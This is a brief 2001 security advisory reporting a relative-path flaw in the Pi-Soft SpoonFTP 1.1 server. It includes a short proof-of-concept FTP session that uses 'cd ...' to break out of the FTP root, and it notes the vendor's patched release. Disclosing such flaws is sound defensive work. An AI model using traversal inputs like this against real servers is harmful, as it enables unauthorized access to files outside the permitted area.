Pi-Soft SpoonFTP Relative Path Vulnerability

A vulnerability exists in Pi-Soft SpoonFTP 1.1 that lets an attacker use relative paths to break out of an FTP root.

Ken Pfeil

September 20, 2001

2 Min Read
ITPro Today logo in a gray background | ITPro Today

Reported September 20, 2001, byJoe Testa.

VERSION AFFECTED

·        Pi-Soft SpoonFTP 1.1 for Windows 2000, Windows NT,Windows Me, and Windows 9x

 

DESCRIPTION
Avulnerability exists in Pi-Soft SpoonFTP 1.1 that lets an attacker use relativepaths to break out of an FTP root.

 

DEMONSTRATION

 

Joe Testa provided the following scenario asproof-of-concept:

 

>ftplocalhost

Connectedto xxxxxxxx.rh.rit.edu.

220SpoonFTP V1.1

User(xxxxxxxx.rh.rit.edu:(none)): jdog

331Password required.

Password:

230User logged in, proceed.

ftp>pwd

257"/" is current directory.

ftp>cd ...

250CWD command successful.

ftp>pwd

257"/..." is current directory.

ftp>

 

VENDOR RESPONSE

Thevendor, Pi-Soft Consulting, has releasedversion 1.1.0.1 to fixthis vulnerability.

 

CREDIT
Discovered by Joe Testa.

Sign up for the ITPro Today newsletter
Stay on top of the IT universe with commentary, news analysis, how-to's, and tips delivered to your inbox daily.

You May Also Like